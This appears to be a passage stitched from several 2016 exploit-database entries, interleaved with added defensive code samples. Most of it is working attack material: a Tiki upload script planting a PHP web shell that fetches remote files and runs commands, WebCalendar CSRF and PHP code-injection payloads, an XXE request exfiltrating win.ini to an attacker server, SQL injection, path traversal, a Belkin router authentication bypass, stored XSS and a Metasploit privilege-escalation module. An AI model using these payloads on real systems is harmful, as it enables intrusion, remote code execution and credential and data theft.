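# Constructed requests: the setpassword POST from the advisory, once with the
# Referer suppressed by <meta name="referrer" content="none">, once as a
# legitimate same-site submission.
SETPASSWORD_FORM = {"formtype": "setpassword", "user": "admin",
                    "upassword1": "1234567", "upassword2": "1234567"}
NO_REFERER = {}
SAME_SITE = {"Referer": "http://localhost/WebCalendar-1.2.7/edit_user.php"}
```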



Exploit code(s):
===============

1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
victim user is required for success.


<meta name="referrer" content="none">

<form id="CSRF" action="http://localhost/WebCalendar-1.2.7/edit_user_handler.php" method="post">
<input type="hidden" name="formtype" value="setpassword" />
<input type="hidden" name="user" value="admin" />
<input name="upassword1" id="newpass1" type="password" value="1234567"  />
<input name="upassword2" id="newpass2" type="password"  value="1234567" />
</form>


2) CSRF Protection Bypass modify access controls under "System Settings" /
"Allow public access"

<meta name="referrer" content="none">

<form id="CSRF_ACCESS_CTRL" action="http://localhost/WebCalendar-1.2.7/admin.php" method="post" name="prefform"><br />
<input type="hidden" name="currenttab" id="currenttab" value="settings" />
<input type="submit" value="Save" name="" />
<input type="hidden" name="admin_PUBLIC_ACCESS" value="Y"  />
<script>document.getElementById('CSRF_ACCESS_CTRL').submit()</script>
</form>


#######################################################

Vulnerability Type:
======================
PHP Code Injection



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

Since WebCalendar's install script is not removed after installation (there
is no "automatic" removal of it), low-privileged users can inject arbitrary
PHP code via the "Database Cache" directory value, as no input validation
exists for it when a user installs the application using the WebCalendar
walk-through wizard.

If WebCalendar's installation script is available as part of a default
image, often as a convenience offered by some hosting providers, this can be
used to gain code execution on the target system. The only requirement is
that the user must have privileges to authenticate to the MySQL database and
to run the install script. So, users who have install wizard access for the
WebCalendar application will have the ability to launch arbitrary system
commands on the affected host.

One problem we must overcome is that WebCalendar filters double quotes ("),
so we cannot use code like <?php echo "/bin/cat /etc/passwd"; ?>. However,
we can get around this obstacle using the all too often forgotten backtick
`CMD` operator!

e.g.

*/?><?php echo `/bin/cat /etc/passwd`; ?>

This results in "settings.php" being injected like...

<?php
/* updated via install/index.php on Wed, 15 Jun 2016 09:44:34 -0400
install_password: e99a18c428cb38d5f260853678922e03
db_type: mysql
db_host: localhost
db_database: intranet
db_login: admin
db_password: abc123
db_persistent: false
db_cachedir: */?><?php echo `/bin/cat /etc/passwd`; ?>
readonly: false
user_inc: user.php
use_http_auth: false
single_user: false
# end settings.php */
?>
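What makes the injection possible is that install/index.php copies each value verbatim into a PHP block comment, so any value containing `*/` terminates the comment and what follows is parsed as PHP. The added example below is not WebCalendar code: it mirrors that layout in Python, adds the validation the installer lacks (the character whitelist for db_cachedir is an assumed policy), and includes an audit check for existing settings.php files.

```python
import re

# Field order of settings.php as written by install/index.php (from the advisory).
SETTINGS_FIELDS = ("install_password", "db_type", "db_host", "db_database",
                   "db_login", "db_password", "db_persistent", "db_cachedir",
                   "readonly", "user_inc", "use_http_auth", "single_user")

# Anything that can terminate the enclosing block comment or PHP tag, or start
# a new line (and so a new key) inside the comment.
BREAKOUT_SEQUENCES = ("*/", "?>", "<?", "\n", "\r")

# Assumed policy for a cache directory: letters, digits and plain path punctuation.
CACHEDIR_PATTERN = re.compile(r"[A-Za-z0-9_./:\\~-]*")


class UnsafeSettingValue(ValueError):
    """A value could alter the structure of settings.php."""


def render_settings_as_shipped(values, updated="<date>"):
    """Lay the file out the way the installer does: every key/value pair inside
    one PHP block comment, values copied verbatim. A value beginning with
    '*/?><?php' therefore closes the comment and runs as code."""
    lines = ["<?php", "/* updated via install/index.php on %s" % updated]
    lines += ["%s: %s" % (key, values.get(key, "")) for key in SETTINGS_FIELDS]
    lines += ["# end settings.php */", "?>"]
    return "\n".join(lines) + "\n"


def validate_setting(key, value):
    """Refuse comment/tag breakouts for every key; constrain db_cachedir further."""
    if any(seq in value for seq in BREAKOUT_SEQUENCES):
        raise UnsafeSettingValue("%s: value would break out of the settings comment" % key)
    if key == "db_cachedir" and not CACHEDIR_PATTERN.fullmatch(value):
        raise UnsafeSettingValue("%s: not a plain directory path" % key)
    return value


def render_settings_hardened(values, updated="<date>"):
    """Same layout, but every value is validated before it is written."""
    safe = {key: validate_setting(key, str(values.get(key, "")))
            for key in SETTINGS_FIELDS}
    return render_settings_as_shipped(safe, updated)


def settings_file_looks_injected(text):
    """Audit check for a deployed settings.php: a clean file contains exactly one
    '<?', one '*/' and one '?>'. Any extra means a value escaped the comment."""
    return text.count("<?") > 1 or text.count("*/") > 1 or text.count("?>") > 1


# Constructed inputs: a normal install and the advisory's hostile cache directory.
CLEAN_VALUES = {"db_type": "mysql", "db_host": "localhost", "db_database": "intranet",
                "db_login": "admin", "db_cachedir": "/var/cache/webcalendar"}
HOSTILE_VALUES = dict(CLEAN_VALUES, db_cachedir="*/?><?php echo `/bin/cat /etc/passwd`; ?>")
```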



Exploitation steps(s):
=====================

1) Login to the WebCalendar Installation Wizard.

2) Proceed to Step 2 of the WebCalendar Installation Wizard in the install
script:
http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2

3) Click "Test Settings" button to ensure connection to the Database.
4) Enter the PHP code below as the value of the "Database Cache Directory:"
input field; for the POC (Windows) it pops the calculator.

*/?><?php exec(`calc.exe`); ?>

5) Click "Next" button
6) Click "Next" button
7) Click "Save settings" button

BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.

If you happen to get following error when clicking "Test Settings" button,
"Failure Reason: Database Cache Directory does not exist", just click back
button then forward or just "Test settings" button again to try get past
the error.


Disclosure Timeline:
===============================
Vendor Notification:  No replies
July 4, 2016 : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX
            
#!/usr/bin/python 
# недействительный 31337 Team
# p4yl04d = https://bethebeast.pl/?p=953    [[::ch4n6e 1p::]]

import requests
import json
from requests.auth import HTTPBasicAuth

url = 'http://192.168.1.152:8080/tiki/vendor_extra/elfinder/php/connector.minimal.php'

headers = {
    'Host': '192.168.1.152:8080',
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    'Content-Type': 'multipart/form-data; boundary=_Part_1337'
}

payload = (
    '--_Part_1337\n'
    'Content-Disposition: form-data; name="cmd"\n\n'
    'upload\n'
    '--_Part_1337\n'
    'Content-Disposition: form-data; name="target"\n\n'
    'l1_Lw\n'
    '--_Part_1337\n'
    'Content-Disposition: form-data; name="upload[]"; filename="evil.php"\n'
    'Content-Type: application/octet-stream\n\n'
    '/*<?php /**/ error_reporting(0); if (isset($_REQUEST["fupload"])) { file_put_contents($_REQUEST["fupload"], file_get_contents("http://192.168.1.10/" . $_REQUEST["fupload"]));};if (isset($_REQUEST["fexec"])) { echo "<pre>" . shell_exec($_REQUEST["fexec"]) . "</pre>";};\n'
    '--_Part_1337--\n'
    )

# If your target uses authentication then use: 
# upload = requests.post(url, headers=headers, data=payload, auth=('admin', 'admin'))
upload = requests.post(url, headers=headers, data=payload)
            
# Exploit Title: php Real Estate Script Arbitrary File Disclosure
# Date: 2016-07-08
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.realestatescript.eu/
# Version: v.3
# Download Link : http://www.realestatescript.eu/downloads/realestatescript-v3.zip

Exploit : 
<?php
// read db config file
$post_data = 'tpl=../../private/config/db.php'; // change read file path
$host = "www.server.local"; // change victim address
$socket = fsockopen($host, 80, $errno, $errstr, 15);
if (!$socket) {
    echo ' error: ' . $errno . ' ' . $errstr;
    die;
} else {
    // change [demo/en] path server
    $path = "/demo/en/";
    $http  = "POST {$path}admin/ajax_cms/get_template_content/ HTTP/1.1\r\n";
    $http .= "Host: $host\r\n";
    $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $http .= "Content-length: " . strlen($post_data) . "\r\n";
    $http .= "Connection: close\r\n\r\n";
    $http .= $post_data . "\r\n\r\n";
    fwrite($socket, $http);
    $contents = "";
    while (!feof($socket)) {
        $contents .= fgets($socket, 4096);
    }
    fclose($socket);
    $e = explode('Content-Type: text/html', $contents);
    print $e[1];
}
?>
            
CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval


Vendor: CyberPower Systems, Inc.
Product web page: https://www.cyberpowersystems.com
Affected version: 3.1.2 (37567) Business Edition

Summary: The PowerPanel® Business Edition software from
CyberPower provides IT professionals with the tools they
need to easily monitor and manage their backup power.
Available for compatible CyberPower UPS models, this
software supports up to 250 clients, allowing users remote
access (from any network PC with a web browser) to instantly
access vital UPS battery conditions, load levels, and runtime
information. Functionality includes application/OS shutdown,
event logging, hibernation mode, internal reports and analysis,
remote management, and more.

Desc: PowerPanel suffers from an unauthenticated XML External
Entity (XXE) vulnerability using the DTD parameter entities
technique, resulting in disclosure and retrieval of arbitrary
data from the affected node via an out-of-band (OOB) attack. The
vulnerability is triggered when input passed to the xmlservice
servlet via the ppbe.xml URL is not sanitized while parsing the
XML inquiry payload returned by the JAXB element translation.

================================================================

C:\Program Files (x86)\CyberPower PowerPanel Business Edition\
\web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\
------------------------
XmlServiceServlet.class:
------------------------

94:  private InquirePayload splitInquirePayload(InputStream paramInputStream)
95:    throws RequestException
96:  {
97:    try
98:    {
99:      JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry");
100:     Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller();
101:     JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream);
102:     return (InquirePayload)localJAXBElement.getValue();
103:   }
104:   catch (JAXBException localJAXBException)
105:   {
106:     localJAXBException.printStackTrace();
107:     throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed.");
108:   }
109: }

---

C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\
--------
web.xml:
--------

28: <servlet>
29: <servlet-name>xmlService</servlet-name>
30: <servlet-class>com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet</servlet-class>
31: <load-on-startup>3</load-on-startup>
32: </servlet>
..
..
60: <servlet-mapping>
61: <servlet-name>xmlService</servlet-name>
62: <url-pattern>/ppbe.xml</url-pattern>
63: </servlet-mapping>

================================================================
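The fix for the unmarshal path above is to refuse any DTD before the document reaches the parser (for JAXB, unmarshal from a StAX reader whose XMLInputFactory has SUPPORT_DTD disabled). Added example, not PowerPanel code: the same gate in Python using expat callbacks, run against the advisory's request body and a DTD-free inquiry; both samples are constructed from the request shown below.

```python
import xml.parsers.expat
from xml.etree import ElementTree as ET


class DoctypeRejected(ValueError):
    """The inbound document declares a DTD; ppbe inquiries never need one."""


def reject_doctype(data):
    """Run expat over the raw bytes with handlers that abort the moment a
    DOCTYPE or an entity declaration appears. Nothing is resolved: no
    ExternalEntityRefHandler is installed, so SYSTEM identifiers such as the
    http://... one in the advisory are never fetched."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeRejected("DOCTYPE %r is not allowed" % name)

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        raise DoctypeRejected("entity declaration %r is not allowed" % name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)


def parse_ppbe_inquiry(data):
    """Gate first, then parse. Returns the command name and whether an
    <inquire/> element is present, which is what the servlet path above
    extracts from the payload."""
    reject_doctype(data)
    root = ET.fromstring(data)
    if root.tag != "ppbe":
        raise ValueError("unexpected root element %r" % root.tag)
    return {
        "command": root.findtext("target/command", default=""),
        "inquire": root.find("inquire") is not None,
    }


# Constructed samples: the hostile request body from the advisory (DOCTYPE and
# parameter entities) and the same inquiry without the DTD.
HOSTILE_REQUEST = (
    b'<?xml version="1.0" encoding="UTF-8" ?>\n'
    b'<!DOCTYPE zsl [\n'
    b'<!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml">\n'
    b'%remote;\n%root;\n%oob;]>\n'
    b'<ppbe><target><command>action.notification.recipient.present</command>'
    b'</target><inquire /></ppbe>'
)
CLEAN_REQUEST = (
    b'<?xml version="1.0" encoding="UTF-8" ?>\n'
    b'<ppbe><target><command>action.notification.recipient.present</command>'
    b'</target><inquire /></ppbe>'
)
```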


Tested on: Microsoft Windows 7 Ultimate SP1 EN
           Microsoft Windows 8
           Microsoft Windows Server 2012
           Linux (64bit)
           MacOS X 10.6
           Jetty(7.5.0.v20110901)
           Java/1.8.0_91-b14
           SimpleHTTP/0.6 Python/2.7.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5338
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php


22.06.2016

--


C:\data\xxe.xml:
----------------

<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.16:8011/?%payload;'> ">


Request:
--------

POST /client/ppbe.xml HTTP/1.1
Host: localhost:3052
Content-Length: 258
User-Agent: XXETester/1.0
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml">
%remote;
%root;
%oob;]>
<ppbe>
<target>
<command>action.notification.recipient.present</command>
</target>
<inquire />
</ppbe>



Response:
---------

C:\data>python -m SimpleHTTPServer 8011
Serving HTTP on 0.0.0.0 port 8011 ...
lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 -
            
######################
# Application Name : Streamo - Online Radio And Tv Streaming CMS

# Google Dork : inurl:rjdetails.php?id=

# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL

# Author Contact : https://twitter.com/byn4tural

# Vendor Homepage : http://rexbd.net/

# Vulnerable Type : SQL Injection

# Date : 2016-07-08

# Tested on : Windows 10 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0.6.28#dev

###################### SQL Injection Vulnerability ######################

# Location :
http://localhost/[path]/menu.php
http://localhost/[path]/programs.php
http://localhost/[path]/rjdetails.php

######################

# Vulnerable code :

$gid = $_GET["id"];


######################

# PoC Exploit:

http://localhost/[path]/programs.php?id=999999.9%27%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%20and%20%27x%27%3D%27x

# Exploit Code via sqlmap:

sqlmap -u http://localhost/[path]/programs.php?id=10 --dbs

Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=10' AND SLEEP(5) AND 'yTqi'='yTqi

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-4222' UNION ALL SELECT NULL,CONCAT(0x7170787871,0x586d5a4275566c486f6f78475a59506c524f5762506944746c7358645a544e527874737478756364,0x7178627071)-- uFiY
---

######################
            
# Exploit Title: Tiki Wiki CMS 15.0 Arbitrary File Download
# Date: 11-07-2016
# Software Link: https://tiki.org
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description

Using the `flv_stream.php` file from the `vendor` directory, we can download any file.

http://security.szurek.pl/tiki-wiki-cms-150-arbitrary-file-download.html

File: tiki-15.0\vendor\player\flv\flv_stream.php

<?php
session_cache_limiter('nocache');
header('Expires: Thu, 19 Nov 1981 08:52:00 GMT');
header('Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0');
header('Pragma: no-cache');

$position = $_GET['position'];
$filename = dirname(__FILE__).'/'.htmlspecialchars($_GET['file']);


if (file_exists($filename)) {
	header('Content-Type: video/x-flv');
	if ($position != 0) {
		echo 'FLV', pack('CCNN', 1, 1, 9, 9);
	}
	$file = fopen($filename, "rb");
	fseek($file, $position);
	while (!feof($file)) {
		echo fread($file, 16384);
	}
	fclose($file);
} else {
	echo 'The file does not exist';
}
?>
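The root cause above is the missing containment check: htmlspecialchars() is an HTML encoder, not a path filter, so every `../` in `$_GET['file']` survives, and `position` goes to fseek() unvalidated. As an added example (not Tiki code), here is that check in Python with a constructed base directory; the traversal string from the PoC below is the negative case.

```python
from pathlib import Path


def parse_position(raw):
    """The 'position' parameter is passed straight to fseek() above; accept
    only a non-negative decimal integer."""
    if not raw.isdigit():
        raise ValueError("position must be a non-negative integer")
    return int(raw)


def resolve_media_path(base_dir, requested, allowed_suffix=".flv"):
    """Canonicalise base_dir/requested and insist that the result stays under
    base_dir and keeps the expected extension. Symlinks are followed by
    resolve(), so a link pointing outside the directory is caught as well."""
    base = Path(base_dir).resolve()
    # Never let an absolute request replace the base: strip leading separators.
    candidate = (base / requested.lstrip("/\\")).resolve()
    if candidate != base and base not in candidate.parents:
        raise ValueError("requested file is outside the media directory")
    if candidate.suffix.lower() != allowed_suffix:
        raise ValueError("only %s files are served" % allowed_suffix)
    return str(candidate)


def plan_stream(base_dir, file_param, position_param):
    """Validate both query parameters and return (path, byte_offset); the
    caller then opens the file and seeks, exactly as the original loop does."""
    return resolve_media_path(base_dir, file_param), parse_position(position_param)


# Constructed base directory mirroring the Tiki layout in the advisory.
FLV_DIR = "/srv/tiki/vendor/player/flv"
```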

2. Proof of Concept

Example for downloading database configuration:

http://tiki/vendor/player/flv/flv_stream.php?file=../../../db/local.php&position=0

3. Solution:
   
Update to version 15.1

Timeline:

    01-06-2016: Discovered
    01-06-2016: Vendor notified
    08-06-2016: Version 15.1 released, issue resolved
            
'''
# Exploit Title: Belkin Router AC1200, Firmware: 1.00.27 - Authentication Bypass
# Date: 5/11/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://www.belkin.com
# Version: Firmware: 1.00.27
# Tested on:F9K1113 v1


#1. Description:

#The Belkin AC1200 is vulnerable to authentication bypass because, after a failed login attempt,
#it performs authentication client side. The page served at that point, loginpserr.stm, contains
#the MD5 hash of the administrator's password. This can be exploited by extracting that hash
#value and passing it in the pws field of a POST request to login.cgi.

#I would like to note that I contacted Belkin on several occasions
#and gave them plenty of time to reply/fix the issue before releasing this entry.



#2. Proof:

#Line 55 of loginpserr.stm contains the javascript code:

#var password = "md5hashofpassword";


#3. Exploit:
'''

#!/usr/bin/python

import urllib
import urllib2
import sys

router = raw_input('Enter IP address of your AC1200 to test: ')

page = urllib2.urlopen('http://'+router+'/loginpserr.stm').read()
test_page = page

vuln_string = 'var password = "'

if vuln_string in test_page:
    print 'Router is vulnerable.'
    answer = raw_input('Would you like to exploit the target? Y/N : ')
else:
    print 'Router is not vulnerable.'
    print 'exiting...'
    sys.exit()

if (answer == 'y') or (answer == 'Y'):
    extract = test_page.split(vuln_string, 1)[1] #These two lines extract the leaked hash value
    _hash = extract.partition('"')[0] #from /loginpserr.stm using quotes as a delimiter
else:
    if (answer == 'n') or (answer == 'N'):
        print 'exiting...'
    sys.exit()

#Assemble the POST request to /login.cgi

headers = {
    'Host': router,
    'Connection': 'keep-alive',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',
    'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language' : 'en-US,en;q=0.5',
    'Accept-Encoding' : 'gzip, deflate',
    'Referer' : 'http://'+router+'/',
    'Content-Type': 'application/x-www-form-urlencoded'
}

data = {
    'totalMSec':'0',
    'pws': _hash,
    'url':'status.stm',
    'arc_action':'login',
    'pws_temp': ''
}

data = urllib.urlencode(data)

#Sends the POST request with the hash in the pws field

req = urllib2.Request('http://'+router+'/login.cgi', data, headers)
response = urllib2.urlopen(req)
the_page = response.read()

print 'Exploit successful.'
print 'You are now free to navigate to http://'+router+'/ ...as admin ;)'
            
Persistent Cross-Site Scripting in All in One SEO Pack WordPress Plugin
David Vaartjes

Abstract
A stored Cross-Site Scripting vulnerability was found in the Bot Blocker functionality of the All in One SEO Pack WordPress Plugin (1+ million active installs). This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf.

Tested versions
This issue was successfully tested on the All in One SEO Pack WordPress Plugin version 2.3.6.1.

Fix
This issue has been fixed in version 2.3.7 of the plugin.

Introduction
All in One SEO Pack is reportedly the most downloaded plugin for WordPress. It allows users to automatically optimize their site for Search Engines. A stored Cross-Site Scripting vulnerability exists in the Bot Blocker functionality.

Details
A stored Cross-Site Scripting vulnerability exists in the Bot Blocker functionality of the All in One SEO Pack WordPress Plugin (1+ million active installs). Particularly interesting about this issue is that an anonymous user can simply store his XSS payload in the Admin dashboard by just visiting the public site with a malformed User Agent or Referrer header.

The SEO Pack Bot Blocker functionality can be used to prevent certain bots from accessing/crawling the website. Bots can be detected based on User Agent and Referrer header patterns. When the User Agent contains one of the pre-configured list of bot names like "Abonti", "Bullseye" or "Exabot" the request is blocked and a 404 is returned.

If the "Track Blocked Bots" setting is enabled (not by default), blocked requests are logged on that settings page without proper sanitization or output encoding, allowing XSS.

The affected resource: /all-in-one-seo-pack/modules/aioseop_bad_robots.php

if ( $this->option_isset( 'block_bots' ) ) {
   if ( !$this->allow_bot() ) {
      status_header( 503 );
      $ip = $_SERVER['REMOTE_ADDR'];
->      $user_agent = $_SERVER['HTTP_USER_AGENT'];
->      $this->blocked_message( sprintf( __( "Blocked bot with IP %s -- matched user agent %s found in blocklist.",
->      'all-in-one-seo-pack' ), $ip, $user_agent ) );
      exit();
   } elseif ( $this->option_isset( 'block_refer' ) && $this->is_bad_referer() ) {
      status_header( 503 );
      $ip = $_SERVER['REMOTE_ADDR'];
->      $referer = $_SERVER['HTTP_REFERER'];
->      $this->blocked_message( sprintf( __( "Blocked bot with IP %s -- matched referer %s found in blocklist.",
->      'all-in-one-seo-pack' ), $ip, $referer ) );
   }
}

The resulting HTML code:

<span class="aioseop_option_input"><div class="aioseop_option_div" ><pre>2016-07-05 18:59:37 Blocked bot with IP 172.16.232.1 -- matched user agent Abonti </pre><script>alert(1);</script>found in blocklist.
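The defect is the missing output encoding at the point where attacker-controlled header values are written into the admin page. The following is an added example, not the plugin's code: a standalone reconstruction of the blocked-bot message in its vulnerable and hardened forms. The WordPress functions `status_header()`, `__()` and `blocked_message()` are replaced by plain PHP so the script runs on its own; the `esc_html_value()` helper is an assumption standing in for WordPress's `esc_html()`, which wraps the same `htmlspecialchars()` call.

```php
<?php
// Added example (not the All in One SEO Pack plugin's code). Reconstructs the
// bot-blocker message with and without output encoding so the two outputs can
// be compared side by side.

// Constructed request values: both come straight from client-controlled headers.
$ip         = '172.16.232.1';
$user_agent = 'Abonti </pre><script>alert(1);</script>';

// Vulnerable form: the raw header value is interpolated into the admin page
// markup, so a value containing "</pre><script>" breaks out of the <pre> block.
function blocked_message_raw(string $ip, string $user_agent): string
{
    return '<pre>' . sprintf(
        'Blocked bot with IP %s -- matched user agent %s found in blocklist.',
        $ip, $user_agent
    ) . '</pre>';
}

// Hardened form: encode every attacker-controlled value for an HTML text
// context at the moment of output. esc_html_value() is a stand-in for
// WordPress's esc_html(); ENT_QUOTES also encodes quotes, which matters if the
// same value is ever placed inside an attribute.
function esc_html_value(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function blocked_message_safe(string $ip, string $user_agent): string
{
    return '<pre>' . sprintf(
        'Blocked bot with IP %s -- matched user agent %s found in blocklist.',
        esc_html_value($ip), esc_html_value($user_agent)
    ) . '</pre>';
}

echo "Vulnerable:\n" . blocked_message_raw($ip, $user_agent) . "\n\n";
echo "Hardened:\n"   . blocked_message_safe($ip, $user_agent) . "\n\n";

// Self-check: the hardened output must never contain a raw tag from the input.
$leaks = strpos(blocked_message_safe($ip, $user_agent), '<script>') !== false;
echo 'Hardened output contains raw <script> tag: ' . ($leaks ? 'yes' : 'no') . "\n";
```

The IP address is encoded as well even though `REMOTE_ADDR` is normally safe: encoding at output is cheaper to reason about than deciding per value which inputs are trustworthy, and it is the fix version 2.3.7 relies on.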

Proof of concept

1/ Go to the "Bad Bot Blocker" settings page in All in one SEO menu.
2/ Enable "Block Bad Bots using HTTP" and/or "Block Referral Spam using HTTP".
3/ Send the exploit request (with the payload in the Referer or User-Agent header) to any URL on the server. Make sure to send it as an anonymous user: when you are logged in (have cookies), you are never treated as a bot.
4/ If everything is set up correctly, your request will be blocked (HTTP/1.1 503 Service Unavailable).
5/ Open the "Bad Bot Blocker" settings page as WP admin.
6/ Your payload will run, since it is logged in a <pre> tag.

The "Track Blocked Bots" setting only shows or hides the <pre> block; it is not needed for the payload to run. The payload can be placed in either the User-Agent or the Referer header.

REQUEST:

GET / HTTP/1.1
Host: 172.16.232.130
User-Agent: Abonti </pre><script>alert(1);</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.232.130/</pre><script>alert(1);</script>
Connection: close
Cache-Control: max-age=0

RESPONSE:

HTTP/1.1 503 Service Unavailable
Date: Tue, 05 Jul 2016 19:31:19 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
      'Description'    => %q{
        This module exploits the vulnerability in mrxdav.sys described by MS16-016.  The module will spawn
        a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing
        the specified payload within the context of the elevated process.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tamas Koczka',                               # Original Exploit
          'William Webb <william_webb[at]rapid7.com>'   # C port and Metasploit module
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => 'false'
        },
      'Targets'        =>
        [
          [ 'Windows 7 SP1', { } ]
        ],
      'Payload'        =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'     =>
        [
          [ 'CVE', '2016-0051' ],
          [ 'MSB', 'MS16-016'  ]
        ],
      'DisclosureDate' => 'Feb 09 2016',
      'DefaultTarget'  => 0
    }))
  end

  def check
    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Detected
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    print_status("Launching notepad to host the exploit...")
    notepad_process_pid = cmd_exec_get_pid("notepad.exe")
    begin
      process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      print_status("Operation failed. Hosting exploit in the current process...")
      process = client.sys.process.open
    end

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll")
    library_path = ::File.expand_path(library_path)
    exploit_mem, offset = inject_dll_into_process(process, library_path)
    print_status("Exploit injected ... injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)
    thread = process.thread.create(exploit_mem + offset, payload_mem)
    sleep(3)
    print_status("Done.  Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.")
  end
end
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby on Rails ActionPack Inline ERB Code Execution',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in the
